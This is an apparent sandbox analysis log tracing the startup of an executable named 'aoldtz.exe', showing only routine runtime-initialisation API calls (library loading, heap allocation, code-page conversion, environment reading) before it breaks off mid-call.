# Flog Txt Version 1 # Analyzer Version: 3.1.1 # Analyzer Build Date: Jul 31 2019 13:47:23 # Log Creation Date: 13.09.2019 13:57:37.802 Process: id = "1" image_name = "aoldtz.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aoldtz.exe" page_root = "0x4baca000" os_pid = "0x930" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aoldtz.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x934 [0032.124] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afbd8 | out: lpSystemTimeAsFileTime=0x2afbd8*(dwLowDateTime=0x4529ce00, dwHighDateTime=0x1d56a3b)) [0032.124] GetCurrentThreadId () returned 0x934 [0032.125] GetCurrentProcessId () returned 0x930 [0032.125] QueryPerformanceCounter (in: lpPerformanceCount=0x2afbd0 | out: lpPerformanceCount=0x2afbd0*=15213430848) returned 1 [0032.143] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0032.143] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0032.143] GetLastError () returned 0x57 [0032.144] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0032.144] GetLastError () returned 0x57 [0032.144] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76c20000 [0032.144] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionEx") returned 0x76c34d28 [0032.144] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0032.144] GetLastError () returned 0x57 [0032.144] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b [0032.144] GetProcAddress (hModule=0x76c20000, lpProcName="FlsSetValue") returned 0x76c34208 [0032.145] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0032.145] GetLastError () returned 0x57 [0032.145] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x0) returned 0x74650000 [0032.148] GetProcAddress (hModule=0x74650000, lpProcName="InitializeCriticalSectionEx") returned 0x0 [0032.148] GetProcessHeap () returned 0x2b0000 [0032.148] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0032.148] GetLastError () returned 0x57 [0032.148] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0032.149] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0032.149] GetLastError () returned 0x57 [0032.149] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76c20000 [0032.149] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b [0032.149] GetLastError () returned 0x57 [0032.149] GetProcAddress (hModule=0x76c20000, lpProcName="FlsGetValue") returned 0x76c31252 [0032.149] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x364) returned 0x2c49b8 [0032.149] GetProcAddress (hModule=0x76c20000, lpProcName="FlsSetValue") returned 0x76c34208 [0032.149] SetLastError (dwErrCode=0x57) [0032.150] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc00) returned 0x2c4d28 [0032.151] GetStartupInfoW (in: lpStartupInfo=0x2afb0c | out: lpStartupInfo=0x2afb0c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aoldtz.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1271b70, hStdOutput=0xcf36a054, hStdError=0xfffffffe)) [0032.151] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0032.151] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0032.151] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0032.151] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aoldtz.exe\" " [0032.151] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aoldtz.exe\" " [0032.151] GetLastError () returned 0x57 [0032.151] SetLastError (dwErrCode=0x57) [0032.151] GetLastError () returned 0x57 [0032.151] SetLastError (dwErrCode=0x57) [0032.151] GetACP () returned 0x4e4 [0032.151] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x220) returned 0x2c4670 [0032.151] IsValidCodePage (CodePage=0x4e4) returned 1 [0032.152] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2afb3c | out: lpCPInfo=0x2afb3c) returned 1 [0032.152] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2af404 | out: lpCPInfo=0x2af404) returned 1 [0032.152] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2afa18, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.152] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2afa18, cbMultiByte=256, lpWideCharStr=0x2af1a8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.152] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x2af418 | out: lpCharType=0x2af418) returned 1 [0032.152] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2afa18, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.152] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2afa18, cbMultiByte=256, lpWideCharStr=0x2af158, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.152] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0032.152] GetLastError () returned 0x57 [0032.152] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0032.152] GetProcAddress (hModule=0x76c20000, lpProcName="LCMapStringEx") returned 0x76cb47f1 [0032.152] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0032.152] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x2aef48, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0032.152] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x2af918, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x80,6ÎTû*", lpUsedDefaultChar=0x0) returned 256 [0032.152] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2afa18, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.152] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2afa18, cbMultiByte=256, lpWideCharStr=0x2af168, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.153] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0032.153] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x2aef58, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0032.153] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x2af818, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x80,6ÎTû*", lpUsedDefaultChar=0x0) returned 256 [0032.153] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x80) returned 0x2c4898 [0032.153] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12ab2d0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aoldtz.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aoldtz.exe")) returned 0x30 [0032.153] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x39) returned 0x2c6130 [0032.153] RtlInitializeSListHead (in: ListHead=0x12aaee8 | out: ListHead=0x12aaee8) [0032.153] GetLastError () returned 0x0 [0032.153] SetLastError (dwErrCode=0x0) [0032.153] GetEnvironmentStringsW () returned 0x2c6178* [0032.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0032.153] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x565) returned 0x2c6c50 [0032.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x2c6c50, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0032.153] FreeEnvironmentStringsW (penv=0x2c6178) returned 1 [0032.153] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x98) returned 0x2c6178 [0032.153] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1f) returned 0x2c6078 [0032.153] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x36) returned 0x2c6218 [0032.153] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x37) returned 0x2c6258 [0032.153] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x3c) returned 0x2c6298 [0032.153] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x31) returned 0x2c62e0 [0032.153] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x17) returned 0x2c4920 [0032.153] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x24) returned 0x2c0df8 [0032.153] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x14) returned 0x2c6320 [0032.153] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xd) returned 0x2beeb0 [0032.153] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x25) returned 0x2c6340 [0032.153] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x39) returned 0x2c6370 [0032.153] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x18) returned 0x2c63b8 [0032.153] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x17) returned 0x2c63d8 [0032.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xe) returned 0x2beec8 [0032.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x69) returned 0x2c63f8 [0032.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x3e) returned 0x2c6470 [0032.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1b) returned 0x2c60a0 [0032.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1d) returned 0x2c60c8 [0032.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x48) returned 0x2c64b8 [0032.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x12) returned 0x2c6508 [0032.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x18) returned 0x2c6528 [0032.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1b) returned 0x2c60f0 [0032.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x24) returned 0x2c6548 [0032.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x29) returned 0x2c6578 [0032.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1e) returned 0x2c71d8 [0032.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x41) returned 0x2c79c0 [0032.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x17) returned 0x2c7a10 [0032.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xf) returned 0x2beee0 [0032.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x16) returned 0x2c7a30 [0032.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x2a) returned 0x2c7a50 [0032.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x29) returned 0x2c7a88 [0032.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x15) returned 0x2c7ac0 [0032.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1e) returned 0x2c7200 [0032.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x2a) returned 0x2c7ae0 [0032.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x12) returned 0x2c7b18 [0032.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x18) returned 0x2c7b38 [0032.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x46) returned 0x2c7b58 [0032.154] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c6c50 | out: hHeap=0x2b0000) returned 1 [0032.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x800) returned 0x2c65b0 [0032.154] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0032.155] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12715f0) returned 0x0 [0032.155] GetStartupInfoW (in: 